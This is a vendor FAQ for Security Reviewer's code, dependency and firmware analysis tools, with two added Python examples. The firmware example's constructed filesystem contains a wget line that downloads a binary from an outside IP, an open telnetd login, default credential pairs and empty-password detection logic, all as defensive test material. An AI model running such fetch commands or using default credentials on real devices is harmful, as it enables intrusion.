Discover how simple it is to use our products by watching the following videos:

[Videos: Run Analysis (SR_RunAnalysis.mp4), Manage Findings (SR_ManageFindings.mp4), Reports (SR_ReportsIntro.mp4)]

Common FAQ

Q. What is your license policy?

Security Reviewer Static Analysis and Software Composition Analysis licenses cover unlimited users, unlimited clients, unlimited servers, unlimited analyses and unlimited lines of code; you only have to specify the IP range on which Security Reviewer will run. An unlimited license includes 1 year of support and maintenance. Additional support and maintenance years must be purchased separately, with special prices for 3 or more additional years. A special offer with a limited number of scans per year (50, 100) exists only for the Static Analysis Desktop Edition. See the Code Inspection and Software Composition Analysis FAQs below.

Q. Do Security Reviewer products require hardware components?

No. Security Reviewer products are made of 100% software components.

Q. Do Security Reviewer products or components rely on other software vendors?

All Security Reviewer software components are developed by Security Reviewer itself; only up-to-date, patched versions of 3rd-party libraries are used (see Open Source Licenses). All support and maintenance tasks are provided by Security Reviewer and its Reseller network. No other vendors are involved.

Q. Are Security Reviewer products securely coded?

All Security Reviewer software is implemented in compliance with secure coding standards such as OWASP, WASC and CWE. Each new version is statically analyzed using Security Reviewer Static Analysis as well as open source and commercial tools such as Fortify.

Q. What does Support & Maintenance services provide?

Our Support Team will get to know your existing Continuous Integration environment, optimize the Security Reviewer integration and make sure that you get maximum value from your investment. Support is provided as an 8x5 or 24x7 service, depending on your Support & Maintenance contract. A Service Desk is included, reachable via a web ticketing system, e-mail or telephone, depending on your contract. The Maintenance service provides product updates and patches on a monthly basis. Patching is done for bug fixing, with a response time from 3 to 48 hours depending on your contract.

Q. Which Support & Maintenance contracts do you provide?

We provide a Basic Support contract (8x5) and Gold or Premium contracts (24x7). Maintenance always includes a monthly release update. Patching (part of maintenance) is done for bug fixing with a response time of 8-48 hours for Basic Support and 3-8 hours for Premium Support (3 hours for High, 5 hours for Medium, 6 hours for Normal and 8 hours for Low priority). For further SLA details, please ask your preferred Reseller.

Q. Which Programming Languages are supported?

See Languages

Q. Do Security Reviewer products support virtualization?

Many virtualization platforms are supported, in different ways depending on the Edition (see the Code Inspection FAQ below):

  • Virtual Desktop Edition is delivered as SaaS through an online VDI platform, running on a VM

  • Server Edition can have its WCF Service running in a VM

  • REST API Edition is delivered as SaaS, running on a VM

  • Developer Edition can run scan tasks remotely in a VM

Desktop Edition cannot run on a local VM.

Q. What about Compliance?

See Compliance Modules

Q. How can I submit an Enhancement Request?

We guarantee deployment of your Change Requests in about 48 hours, and your Feature Requests are developed within the next 30 working days. We are committed to helping our clients reach their goals, personalizing their Security Reviewer experience, providing an innovative environment and making a difference. Once you are a customer of ours, feel free to ask for what you need and you will get it for free! Your enhancement request will be inserted in the product roadmap and delivered to you soon!

The best way to submit an enhancement request for your Security Reviewer product is to go to https://www.securityreviewer.net/support, select the product you are interested in and then the related section. Otherwise you can send your request via e-mail to info@securityreviewer.com

The benefit of posting your suggestion on the Support site is that you “own” it. You will be notified by email of all replies and you will be the “thought leader” for the idea. Other users can see that the enhancement request is your idea, and you can lead the conversation in a way that will make your request compelling to Security Reviewer. Other users can “vote” on your idea and you can “campaign” for votes for your idea. Other users may also suggest a workaround or another way that you can accomplish your objective.

Security Reviewer’s Product Management reviews the submitted requests regularly, and you should see a reply within two or three days.

For all the reasons above, posting and socializing your request on the Support site is the most productive and informative place to open an enhancement request.

We confirm that no additional costs are required for new available features during your support contract. New features may involve:

  • New supported OS

  • New supported languages

  • Enhanced products' features

Q. Do you have a Certification Program?

We do not offer Consultancy Services directly to Customers. Beware of false Security Reviewer 'experts'. To ensure project success, we offer a Certification Program that is mandatory for every Consultancy Firm using our products in a consultancy project at a customer's site. See Our Certification Program

Q. How can I contact a Distributor?

See Our Reseller Network

Code Inspection FAQ

Q. Which Editions are available?

In addition to our Continuous Integration (CI) plugins (see the related FAQ) and IDE Plugins, the following Editions are available:

  • Desktop Edition. All features are provided by this Windows desktop app; the SQALE Dashboard and the CLI Interface are included. It is installed on premises and is available with both Unlimited and Limited (50, 100, etc.) scans/year.

  • Virtual Desktop Edition. All features are provided by this Remote Desktop app, running on Windows, macOS and Linux. The SQALE Viewer is included.

  • Developer Edition. Choose one of the IDE plugins, and you can scan, view results and create reports directly inside your IDE. Windows only.

  • Server Edition. An additional module for the Desktop Edition. It shares configurations, False Positives, Exclusions, Results and even encrypted source code between Desktop Editions.

  • REST API Edition. A Java CLI Interface runs scans, checks scan progress and downloads Results from an on-premises REST API Server.

Q. Which Infrastructure is required for running your products?

Desktop Edition

Windows

      Microsoft® Windows 10 Professional or Enterprise (Home edition not supported), Windows Server 2008 R2 or newer (Windows Server 2012 R2, 2016, 2019 and 2022 included).

      A 64-bit environment is recommended for better performance.

      .NET Core 5 preinstalled using the offline installer.

      Oracle JDK 1.8 or Oracle JDK 11 preinstalled. For further details, please refer to the related chapter below.

      At least 4 GB RAM, or the minimum RAM required by the host system

      2 cores

      A physical hard disk larger than 200 GB

      1 GB of free space on the C: drive while running

Linux

      CentOS Linux 7.x, 8.x or newer, Ubuntu 16.04 or higher, Debian 9 or higher, Oracle Linux 7.x or 8.x, Fedora 21 or higher, Red Hat Enterprise Linux 7.x or 8.x

      A 64-bit environment is mandatory

      Oracle JDK 1.8 preinstalled. It won’t run with OpenJDK

      Python 3.6 or higher

      At least 4 GB RAM, or the minimum RAM required by the host system

      2 cores

      A physical hard disk larger than 200 GB

      1 GB of free disk space while running

macOS

      macOS 10.x (Sierra) or newer, 64-bit

      .NET Core 5 preinstalled using the offline installer.

      Oracle JDK 1.8 or Oracle JDK 11 preinstalled. For further details, please refer to the related chapter below.

      At least 4 GB RAM, or the minimum RAM required by the host system

      2 cores

      A physical hard disk larger than 200 GB

      1 GB of free disk space while running

Virtual Desktop Edition

Host system: Microsoft® Windows, macOS or Linux; no particular configuration is required. The application runs on a remote Windows Server. If you need that server on your premises, it requires the same configuration as the Server Edition.

Developer Edition

Same configuration as the Desktop Edition, with one of the IDE Plugins installed.

Server Edition

Windows: Windows Server 2008 or newer (Windows Server 2012 R2, 2016 and 2019 included). .NET Framework 4.8 redistributable preinstalled. IIS 7.5 or newer for the WCF service

Linux:

Mac:

  • macOS 10.x (Sierra) or newer

JDK 1.8 or JDK 11 preinstalled.

Minimum RAM required by the host system.

REST API Edition

Same configuration as the Server Edition, with Apache Tomcat 9 additionally installed.

Q. Which Virtualization Platforms are supported by Static Analysis?

See Infrastructure

Q. Which Operative Systems are supported by Static Analysis?

See Infrastructure

Q. What is the Database role in Static Analysis?

Static Analysis does not need an RDBMS to run, and it is fully extensible via XML.

Q. Is Internet access required?

No. Static Analysis does not require Internet access. Remediation Tips, reference documentation and Standards contain external links; these can be disabled in the configuration, as customers often require.

Q. Which Security Rules are supported in the Static Analysis?

See Agile & DevOps Security

Q. How Security Rules are maintained up-to-date?

See Our Independent Advisors Network

Q. For each Security Vulnerability, which details are provided?

When a Security Vulnerability is detected, the following detailed attributes are provided (the video "SR AT1-AT15" walks through them; media not reproduced here):

Attribute  Field            Description
AT1        Vuln ID          Vulnerability unique identifier
AT2        Component        Component name and version
AT3        File             Vulnerable file pathname, class and method (program and PERFORM in COBOL)
AT4        Line of code     Vulnerable line inside the file
AT5        Description      Vulnerability description (includes links to external documentation and known attack vectors)
AT6        Category         Vulnerability category
AT7        Standard         Compliance/best-practice international standard (OWASP, CWE, CVE, WASC, PCI-DSS)
AT8        Rule             Unique identifier and description of the violated rule
AT9        CVSS             Common Vulnerability Scoring System v3.1 score
AT10       Severity         Blocker (Very High), Critical (High), Major (Medium), Minor (Low), Info (Very Low)
AT11       Code Snippet     Source code lines surrounding the vulnerable one
AT12       Status           ‘Confirmed’ means a true vulnerability, ‘Not An Issue’ means a false positive; other values such as ‘Not Exploitable’ are available, in line with international standards
AT13       Remediation Tip  Short suggestion for fixing the vulnerability
AT14       Application      Analyzed application name
AT15       Version          Analyzed application version
AT16       Responsible      Team responsible for remediation
           Outsourcer       Outsourcer contributing to remediation
AT17       Priority         Number from 1 (Urgent) to 5 (Cosmetic) representing the fixing priority

Q. Can Static Analysis provide per-component results?

Before executing the Static Analysis, source code may be grouped into Components via the Component Builder feature. Results are then provided by Component, and an Outsourcer and/or Development Team can be associated with each Component, as well as the related Application Portfolio ID and Project Initiative.

Q. When Analysis ends, is there a notification service?

When the Analysis terminates, an e-mail can be sent to a single target address and/or a mail group using your own SMTP server. Notifications can also be sent via Slack, Microsoft Teams or any platform with WebHook support. See Ecosystem for further details.

Q. Which Analysis results output formats are supported?

Results are exported in customizable PDF, Word, Excel, HTML, CSV, JSON and XML formats. Reports can be customized with an ISO 9001 cover page, your logo, a Classification and your Responsibility Chain.

Q. May I suppress a vulnerability?

Yes, you can mark a vulnerability as a False Positive and add Notes and a Vulnerability Status, all associated with a specific author. This information is reused in the next Analysis and included in the reports. See False Positives and False Negatives

Q. In Static Analysis, may I create custom Security Rules?

You can exclude some of the available Security Rules from the Static Analysis, or create new Security Rules using the Digital Secure Assist standard. Those rules can be associated with a specific analysis, or with a single Application or Group of applications.

Q. Which Development IDE are supported?

Currently, Eclipse, NetBeans, Visual Studio, Visual Studio Code, IBM Rational Team Concert, Rational Software Architect, Rational RAD Studio, JetBrains IntelliJ IDEA, RubyMine, WebStorm, PhpStorm, PyCharm, AppCode and Android Studio plugins are available. See IDE Plugins

CI Plugins FAQ

Q. Which Infrastructure is required for running your CI plugins?

Our CI plugins rely on the Jenkins and Bamboo infrastructure to run and do not require additional resources.

Q. What do I have to do when the number of Users, Clients or Servers grows?

Our CI plugins rely on the Jenkins and Bamboo infrastructure to run. If you need to increase the number of users, clients or servers, you must scale your own infrastructure; this does not affect the CI plugin configuration and there are no additional costs.

Q. Where can I find CI Plugins manual?

When a product is purchased, the following manuals are provided for each product: Solution Overview, Installation Manual (includes Troubleshooting), User’s Manual (includes Release Update and Patching procedures as well as the OWASP Dependency Track user’s guide), IDE plugin manual, REST API interface manual, SonarQube Plugin manual, ThreadFix Integration manual and CLI Interface manual. These manuals are updated together whenever a new Release becomes available.

Q. Which Virtualization Platforms are supported?

Virtualization does not affect the CI plugin configuration and there are no additional costs. Our CI plugins rely on the Jenkins and Bamboo infrastructure to run. Our solutions have nevertheless been tested on VMware vSphere/ESXi, Oracle VirtualBox, Microsoft Hyper-V, Red Hat Enterprise Virtualization and KVM virtual machines.

Q. Which Operative Systems are supported?

Please refer to Infrastructure page for further information

Q. Which Cloud DevOps Platforms are supported?

Please refer to Infrastructure page for further information

Q. What is the Database role in your solutions?

Our solutions do not need an RDBMS to run; they are fully extensible via XML. Only Software Composition Analysis uses, for temporary storage, an unmodified binary redistribution of the H2 database engine (http://www.h2database.com/). It needs neither support nor backup.

Q. Do I need to Backup and Restore Data and Configurations?

No backup or restore of configurations or data is required, because our products are standard CI plugins. Data is stored in your Software Configuration Management platform (i.e. Git, SVN, CVS, TFS, etc.), and configurations are inside your CI platform. Please refer to your internal Jenkins or Bamboo operating procedures.

Q. Can your products retrieve Data and Configurations from a Network File System?

The only data used by our CI Plugins is the External Sources data used by Software Composition Analysis. Such data is stored temporarily in an H2 database and refreshed automatically. No backup or maintenance is needed.

Q. How can I install your CI Plugins?

Installation is made in two phases:

  • Core product installation

  • CI Plugin Installation.

Core Product installation concerns the Static Analysis or Software Composition Analysis products and consists of copying and unzipping a few files into a specific folder. CI Plugins can be installed directly from Jenkins or Bamboo using their plugin manager, via the CLI Interface, or via the plugin download feature. See:

CI Plugins cannot run without a previous Core product installation.

Everything is installed on-premises and can be installed in unattended mode using the CLI Interface

Q. May I use an internal Proxy when Internet access is required?

Only the Software Composition Analysis CI Plugin requires Internet access, in order to reach the External Sources. An internal proxy server belonging to your organization can be used; it must be configured inside your CI Platform:

Q. If new features will be available, is there an additional cost?

No additional costs are required for new available features during your support contract. New features may involve:

  • New supported OS

  • New supported languages

  • Enhanced products' features

Q. Do you have Logging features?

Our CI Plugins support Logging. See available Logging options

Q. Can it run in a Docker image?

Our CI Plugins rely on your CI Platform infrastructure. They have been tested with Docker, Kubernetes, OpenShift and a number of appc-compliant container platforms. No special Dockerfile is needed

Q. Can it run in multi-tenancy?

Our CI Plugins can run in multi-tenancy mode, depending on your CI Platform configuration. See: https://www.cloudbees.com/blog/multi-tenancy-jenkins and https://community.atlassian.com/t5/Data-Center-questions/Multi-Tenancy-within-the-product-or-different-instances/qaq-p/582750

Q. Which Package Managers are supported?

Software Composition Analysis (SCA) CI Plugin supports various Package Managers. See Package Managers.

For both Static Analysis and Software Composition Analysis, Ant, Maven and Gradle plugins are available.

Q. Which Security Rules are supported in the Static Analysis?

See Agile & DevOps Security

Q. How Security Rules are maintained up-to-date?

See Our Independent Advisors Network

Q. For each Security Vulnerability, which details are provided?

When a Security Vulnerability is detected, a number of details are provided.

Static Analysis provides:

  • Vulnerable File Name

  • Vulnerable class / method / function or perform (for COBOL)

  • Vulnerability Map

  • OWASP Top 10 classification

  • CWE ID

  • WASC ID

  • CVSS v3 classification (base score and vectors)

  • CVE/CPE

  • Severity (Blocker, Critical, Major, Minor, Info)

  • Vulnerability Category

  • Vulnerability Description (includes external documentation and known attack vectors links)

  • Remediation Tip

Software Composition Analysis provides:

  • Vulnerable Library / Framework / File Name

  • CPE Vulnerability ID

  • Package

  • Highest Severity, CVE Count, Evidence Count (Vulnerabilities can be many)

  • OWASP Top 10 classification (usually A9: Using Components with Known Vulnerabilities)

  • Vulnerability Description

  • License type

  • Evidence (Type, Source, Name, Value, Confidence)

  • Related Dependencies

  • Published Vulnerabilities. For each vulnerability: CVE/NPM ID, Description (Remediation included), Severity, CWE ID, CVSS v2 and v3 classification (base score and vectors), References, Vulnerable Software and Versions.

Q. When a vulnerable Library/Framework is detected, is an alternative suggested?

When a vulnerable library/framework is detected, the Vulnerability Description suggests the minimum next non-vulnerable version. If the vulnerability involves only a certain library function, and the analyzed application does not use that vulnerable function, the related Severity is lowered.
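As an added example (not Security Reviewer's own code), the Python below shows the two decisions described above: picking the minimum version that clears every advisory affecting a component, and lowering the severity when the affected function is never called by the application. The advisory records, the component name examplelib, its versions and the function names are all constructed for illustration; the severity ladder follows the Info/Minor/Major/Critical/Blocker scale used on this page.

```python
"""Added example, not Security Reviewer code: choose the minimum
non-vulnerable version of a component and lower the severity of an
advisory whose affected function the application never calls.
All advisory records, names and versions below are constructed."""
import re

SEVERITY_ORDER = ["Info", "Minor", "Major", "Critical", "Blocker"]

# Constructed advisories: a version v is affected when introduced <= v < fixed.
ADVISORIES = [
    {"id": "ADV-0001", "component": "examplelib", "introduced": "2.0.0",
     "fixed": "2.15.0", "severity": "Critical", "functions": {"lookup"}},
    {"id": "ADV-0002", "component": "examplelib", "introduced": "2.10.0",
     "fixed": "2.16.0", "severity": "Major", "functions": {"render"}},
    # A later regression: the first fixed release of ADV-0002 is itself affected.
    {"id": "ADV-0003", "component": "examplelib", "introduced": "2.16.0",
     "fixed": "2.16.2", "severity": "Minor", "functions": {"parse"}},
]


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); shorter strings are padded so 2.14 == 2.14.0."""
    parts = [int(p) for p in re.findall(r"\d+", text)][:3]
    return tuple(parts + [0] * (3 - len(parts)))


def affected(adv, version):
    v = parse_version(version)
    return parse_version(adv["introduced"]) <= v < parse_version(adv["fixed"])


def next_safe_version(component, version, advisories=ADVISORIES):
    """Smallest release above `version` that no advisory for the component
    affects, or None when the current version is already clean.  Taking the
    first 'fixed' value is not enough: 2.15.0 fixes ADV-0001 but is still
    inside ADV-0002, and 2.16.0 is inside ADV-0003."""
    relevant = [a for a in advisories if a["component"] == component]
    if not any(affected(a, version) for a in relevant):
        return None
    for candidate in sorted({a["fixed"] for a in relevant}, key=parse_version):
        if parse_version(candidate) > parse_version(version) and \
                not any(affected(a, candidate) for a in relevant):
            return candidate
    return None


def called_functions(source):
    """Identifiers in call position in the application source (crude on purpose)."""
    return set(re.findall(r"\b(\w+)\s*\(", source))


def lowered(severity):
    """One step down the severity ladder; Info stays Info."""
    return SEVERITY_ORDER[max(SEVERITY_ORDER.index(severity) - 1, 0)]


def assess(component, version, source, advisories=ADVISORIES):
    """Return (next_safe_version, findings) where each finding is
    (advisory id, effective severity, reachable)."""
    calls = called_functions(source)
    findings = []
    for adv in advisories:
        if adv["component"] != component or not affected(adv, version):
            continue
        reachable = bool(adv["functions"] & calls)
        severity = adv["severity"] if reachable else lowered(adv["severity"])
        findings.append((adv["id"], severity, reachable))
    return next_safe_version(component, version, advisories), findings


if __name__ == "__main__":
    # Constructed application source: calls lookup() but never render().
    app_source = "import examplelib\nresult = examplelib.lookup(user_input)\n"
    print(assess("examplelib", "2.14.1", app_source))
```

The candidate loop is the point of the example: the first release that fixes one advisory can still sit inside another advisory's range, so the suggested version has to be checked against every advisory for the component, not just the one being reported. The reachability test here is a regex over call sites; a real SCA engine would use the call graph, but the severity decision it feeds is the same.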

Q. May I continuously monitor the Libraries / Frameworks vulnerabilities?

Your library/framework can be clean today but vulnerable tomorrow. For continuous monitoring, we provide a Maven Plugin for Sonatype Nexus Repository and JFrog Artifactory. The Maven plugin can be executed inside your CI Platform as a build task and, in addition to a repository, a folder on a Network File System can be periodically analyzed using the same plugin.

Q. Do you analyze Container Images?

Yes. We analyze both system libraries and the libraries/frameworks used by applications. See Containers Security for further details

Q. May I isolate a vulnerable Library/Framework, to avoid its publishing?

Yes. A vulnerable library/framework can be blacklisted and notified to Sonatype Nexus Repository and JFrog Artifactory, to avoid putting it into production

Q. Do you support CI pipelines?

Yes. We support Jenkins and Bamboo pipelines natively. For other CI Platforms, our CLI Interface is multi-threaded and pipeline-ready by design. See Infrastructure for a list of tested CI Platforms

Q. Besides the CI Plugins, do you have a GUI interface?

Yes. Our plugins use the embedded Jenkins / Bamboo GUI, providing all scan and configuration features, such as:

Build Task (both Static and SCA task)

– Path to scan

– Output directory

– Generate Report: HTML, XML, JSON, CSV, PDF, Word

Static Analysis Build Task

– Project Name

– Version

– Exclusion List

– Incremental Analysis

– Programming Language

SQL dialects: PL/SQL, T-SQL, U-SQL, Teradata SQL, SAS SQL, IBM DataStage, ANSI SQL, IBM DB2, IBM Informix, SAP Sybase, Micro Focus Vertica, MySQL, Firebird, PostgreSQL, SQLite, MongoDB, Hibernate Query Language, Hadoop PL, HiveQL.

NoSQL: MongoDB, CouchDB, Azure Cosmos DB, Basho, Couchbase, Scalaris, Neo4j, Infinispan, Hazelcast, Apache HBase, Dynomite, Hypertable, Cloudata, HPCC, Stratosphere, Amazon DynamoDB, Oracle NoSQL, DataStax, ElasticDB, OrientDB, MarkLogic, RaptorDB, Microsoft HDInsight, InterSystems, Red Hat JBoss Data Grid, IBM Netezza, InfiniDB, BigMemory, GemFire, Accumulo, GigaSpaces, SAP HANA, Cloudera, Membase, SimpleDB, Redis, Cassandra.

Mobile DB: SQLite, eXtremeDB, Firebase, Cognito, Core Data, Couchbase Mobile, Perst, UnQLite, LevelDB, Berkeley DB, Realm Mobile, ForestDB, InterBase, Snappy, SQL Anywhere.

– Load Type: Folder, Project, Component

– Target Browser version of Chrome, Firefox, Opera, IE, Edge, Safari

– Auditor

– Scan Options: Trusted Functions/Queries/Env/Socket/Servlet/WS/REST, Source Lines to be reported, Max Vulns per line, Max Issues

Manage Jenkins->Configure System, Bamboo Configure Task

– Temporary directory

– Global Data Directory

– Data mirroring scheme: CPE/CVE/Retire.js/All

– CVE 1.2/2.0 base/modified URL

– Enable analyzer: JAR, archive, assembly (DLL/EXE), Maven Central, NuSpec, Nexus, JFrog, Autoconf, CMake, PHP Composer, Node Package, Node (NPM) Audit, Retire.js, MSBuild, NuGet, OpenSSL, Python distribution/package, Ruby Bundler Audit, RubyGem, CocoaPods, Rust Cargo, Swift Package Manager, Snyk

– Nexus Services URL

– JFrog Artifactory URL, API Token, API user, Bearer Token

– e-mail Notification: SMTP Server, Default user e-mail suffix, Use SSL, SMTP Port, Account Details, Content Type

– WebHook Notification: Request parameter, Token header, Authorization header of type Bearer

Q. May I separate Dev, Stage and Production environments?

Our CI Plugins rely on your CI Platform infrastructure. It is up to you to install separate CI environments at your site, with no additional costs

Q. Can Static Analysis provide per-component results?

Before executing the Static Analysis, source code may be grouped into Components via the Component Builder feature. Results are then provided by Component, and an Outsourcer and/or Development Team can be associated with each Component, as well as the related Application Portfolio ID and Project Initiative.

Q. When Analysis ends, is there a notification service?

When the Analysis terminates, an e-mail can be sent to a single target address and/or a mail group using your own SMTP server. Notifications can also be sent via Slack, Microsoft Teams or any platform with WebHook support. See Ecosystem for further details.

Q. Which Analysis results output formats are supported?

Results are exported in customizable PDF, Word, Excel, HTML, CSV, JSON and XML formats. Reports can be customized with an ISO 9001 cover page, your logo, a Classification and your Responsibility Chain.

Q. May I suppress a vulnerability?

Yes, you can mark a vulnerability as a False Positive and add Notes and a Vulnerability Status, all associated with a specific author. This information is reused in the next Analysis and included in the reports.

Q. Do you have a Web Interface?

The web interface is used in two different ways. From within your CI Platform web interface you can launch the Analysis, view the results, suppress False Positives and export the results. From within the OWASP Dependency Track portal you can launch a Software Composition Analysis, view the Static Analysis and Software Composition Analysis results, suppress False Positives and export the results.

Q. In Static Analysis, may I create custom Security Rules?

You can exclude some of the available Security Rules from the Static Analysis, or create new Security Rules using the Digital Secure Assist standard. Those rules can be associated with a specific analysis, or with a single Application or Group of applications.

Q. Which Development IDE are supported?

Currently, Eclipse, NetBeans, Visual Studio, Visual Studio Code, IBM Rational Team Concert, Rational Software Architect, Rational RAD Studio, JetBrains IntelliJ IDEA, RubyMine, WebStorm, PhpStorm, PyCharm, AppCode and Android Studio plugins are available. See IDE Plugins

Q. Which Continuous Integration Platforms do you support?

Our CI Plugins are native for Jenkins (CloudBees ready) and Atlassian Bamboo CI/CD. Other CI Platforms are supported via the CLI and REST API Interfaces. At customers’ sites we have so far tested:

  • Azure DevOps

  • Concourse-CI

  • AppVeyor

  • Travis CI

  • Circle CI

  • TeamCity

  • Codenvy

  • Chef

  • AnthillPro

  • GoCD

Q. Which Issue Tracking Platform do you support?

Our CI Plugins integrate with Issue Tracking in two different ways:

Q. Do you integrate with external Dashboards, like SonarQube or ThreadFix?

Yes, the SonarQube and ThreadFix integrations are natively supported. Other dashboard support is provided via OWASP Dependency Track. See Dashboards

Q. Do you provide REST API and CLI interfaces?

REST API are provided in two ways:

  • via your CI Platform REST API: you can launch Static Analysis or Software Composition Analysis and download results

  • via OWASP Dependency Track: you can launch Software Composition Analysis, download results, and manage users, groups, rules and roles

A CLI interface is provided for both Static Analysis and Software Composition Analysis: you can launch the analysis in async mode, check the analysis status, download results and manage rules

Both REST API and CLI interface are well documented in related manuals

Q. What is your AD/LDAP and role-profiling support?

The web interface, also accessible via REST API, is used in two different ways: from within your CI Platform web interface or through OWASP Dependency Track. Both solutions support:

  • Integration with your AD/LDAP for Role profiling at User, Group, Projects, Teams and Application Level

  • Role profiling for Administrator, for AD/LDAP and Local Users, Groups, Projects, Applications and Teams management (import, create, edit, delete)

  • Role profiling for Configuring Analysis, Configuring Rules, Executing the Analysis or Browsing Analysis results (Remediation suggestions included), per Application basis

  • Custom Role profiling for each single feature access (deny, read-only, etc.)

Q. How can I monitor your tools behavior?

Our products can be monitored in different ways:

Firmware Reviewer FAQ

Q. Which are the installation modes?

Firmware Reviewer can be installed on premises (setup or VMware virtual machine) or in the cloud

Q. What are the installation Hardware and Software Requirements?

See System Requirements.

Q. What kind of analyses can Firmware Reviewer execute on a firmware image?

Firmware Reviewer executes both Static and Dynamic Analysis. After extracting the bootloader and file system from the image, the Static Analysis consists of executing a Task List, which includes checking the OS, system libraries, 3rd-party libraries, executables and scripts against CVE and Exploit databases to find known vulnerabilities. Script source code is also submitted to Security Reviewer’s SAST module to check for OWASP, WASC and CWE vulnerabilities. It also reveals visible configuration, IPs, e-mails, URIs, visible services, unwanted programs and compliance issues. Dynamic Analysis consists of device emulation and of applying attacker patterns to the firmware image. Dynamic Analysis also executes a Hardening Compliance test and other tests such as Malware Scanning, using an embedded version of Metasploit against our own collection of rules. See the Malware question below.

Q. Firmware Reviewer executes the Dynamic Analysis using emulation techniques. How can it emulate complex devices?

Firmware Reviewer emulates a device using our own enhanced version of QEMU. For complex firmware it can execute a partial emulation (bootloader and init system) and install a /wiki/spaces/KC/pages/1455980582 in the firmware bootloader, in order to handle encrypted firmware and gain access to login credentials. This increases the comprehensiveness and accuracy of the Dynamic Analysis.

Q. How can external open source tools be orchestrated and integrated by Firmware Reviewer?

Firmware Reviewer provides a Plugin Developer’s Kit as well as a /wiki/spaces/KC/pages/1406631937 interface. External tools are orchestrated within dedicated plugins and, in the case of external systems, through REST API. Results are automatically correlated in a single report.

Q. How is Secure Source Code Analysis integrated in Firmware Reviewer?

Firmware Reviewer makes use of Security Reviewer’s native SAST module to analyze source code found inside the firmware image (shell scripts, Python, PHP, Lua, JavaScript, etc.) in order to check for OWASP, WASC and CWE vulnerabilities.

Q. How are exposed vulnerable functions detected by Firmware Reviewer?

Firmware Reviewer detects exposed vulnerable standard library functions, such as strcpy, sprintf, strcat, strncat, memcpy, memmove, gets, getw, system, etc., by analyzing all binaries found in the firmware. They can expose the firmware to Buffer Overflow, Heap Overflow, Stack Overflow, DoS, Command Injection and Integer Overflow vulnerabilities, as described by the CISA/CERT coding practices and the CERT C Secure Coding Standard. They can be included both in system components and in application components. For system components it is suggested to update them to a non-vulnerable version, while for vulnerable application components it is suggested to use safe functions such as strcpy_s, sprintf_s, etc. The vulnerabilities are classified using CVE and CVSS scoring.

Q. Suppose I fixed some vulnerabilities reported by Firmware Reviewer. How can I verify that those vulnerabilities have been fixed?

You can execute a Firmware analysis of the new version and use Firmware Reviewer’s Compare feature to discover new or fixed vulnerabilities between the two versions.

Q. I discovered that some users used for service startup have an Empty or Default Password. Firmware Reviewer reports them as vulnerable users. How can I test whether those users are exploitable?

Using our /wiki/spaces/KC/pages/1455980582, users with empty or default passwords are automatically monitored by Firmware Reviewer. At emulation runtime, when a service is accessed using the real credentials, the /wiki/spaces/KC/pages/1455980582 tracks it and tries to use those real credentials to log in. Firmware Reviewer never accesses physical devices; it only emulates them.
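As an added example (not Firmware Reviewer's own code), the Python below performs, on an extracted root filesystem, the static checks listed in the Static Analysis answer above (visible IPs, e-mails and URIs) together with the empty-password and default-credential detection this answer describes. The rootfs is constructed in memory as a path-to-content map, the hash strings are stand-ins, and the default-credential list is a small illustrative sample; none of it is data from the product.

```python
"""Added example, not Firmware Reviewer code: static checks over an
extracted firmware root filesystem.  The rootfs is constructed in memory
as {path: content}; hashes are stand-ins and the default-credential list
is an illustrative sample rather than a real database."""
import ipaddress
import re

# Constructed sample of factory default (username, password) pairs.
DEFAULT_CREDENTIALS = {("admin", "admin"), ("root", "root"), ("admin", "1234")}

# Constructed extracted rootfs.
ROOTFS = {
    "etc/passwd": "root:x:0:0:root:/root:/bin/sh\n"
                  "admin:x:1000:1000::/home/admin:/bin/sh\n"
                  "svc:x:1001:1001::/var:/bin/false\n",
    "etc/shadow": "root:$1$salt$fakehash:18000:0:99999:7:::\n"
                  "admin::18000:0:99999:7:::\n"        # empty password field
                  "svc:!:18000:0:99999:7:::\n",        # locked account
    "etc/init.d/rcS": "#!/bin/sh\n"
                      "telnetd -l /bin/login &\n"
                      "wget http://203.0.113.10/update.bin -O /tmp/u\n"
                      "echo 'report to ops@example.com' > /tmp/note\n"
                      "ntpd -p 10.0.0.1\n",
    "etc/config/cloud.conf": "user=admin\npass=admin\nhost=192.0.2.7\n",
}

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URI_RE = re.compile(r"\b[a-z][a-z0-9+.-]*://[^\s'\"]+")
EMAIL_RE = re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b")

# Address ranges treated as LAN/loopback; anything else counts as external.
# (ipaddress.is_global would also exclude the documentation ranges used here.)
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/8")]


def is_external(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in LOCAL_NETS)


def empty_password_accounts(rootfs):
    """Accounts whose /etc/shadow password field is empty: login needs no
    password at all.  '!' and '*' mean the account is locked, not empty."""
    found = []
    for line in rootfs.get("etc/shadow", "").splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[1] == "":
            found.append(fields[0])
    return found


def default_credential_hits(rootfs):
    """(path, user, password) for config files whose user=/pass= pair
    matches a known factory default."""
    hits = []
    for path, content in sorted(rootfs.items()):
        if not path.endswith(".conf"):
            continue
        kv = dict(re.findall(r"^(\w+)=(.*)$", content, re.M))
        pair = (kv.get("user"), kv.get("pass"))
        if pair in DEFAULT_CREDENTIALS:
            hits.append((path,) + pair)
    return hits


def network_indicators(rootfs):
    """Hard-coded external IPs, URIs and e-mail addresses in any file."""
    out = {"ips": set(), "uris": set(), "emails": set()}
    for content in rootfs.values():
        out["ips"].update(ip for ip in IPV4_RE.findall(content) if is_external(ip))
        out["uris"].update(URI_RE.findall(content))
        out["emails"].update(EMAIL_RE.findall(content))
    return out


if __name__ == "__main__":
    print("empty passwords:", empty_password_accounts(ROOTFS))
    print("default credentials:", default_credential_hits(ROOTFS))
    print("network indicators:", network_indicators(ROOTFS))
```

Note the distinction the shadow check makes: an empty second field lets anyone log in without a password, whereas "!" or "*" in that field locks the account and is not a finding. The LAN filter is deliberately explicit rather than relying on ipaddress.is_global, which would also discard the 192.0.2.0/24 and 203.0.113.0/24 documentation addresses used in the sample.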

Q. Firmware Reviewer reports OS and 3rd-party component vulnerabilities. How can I verify whether those vulnerabilities are exploitable or not?

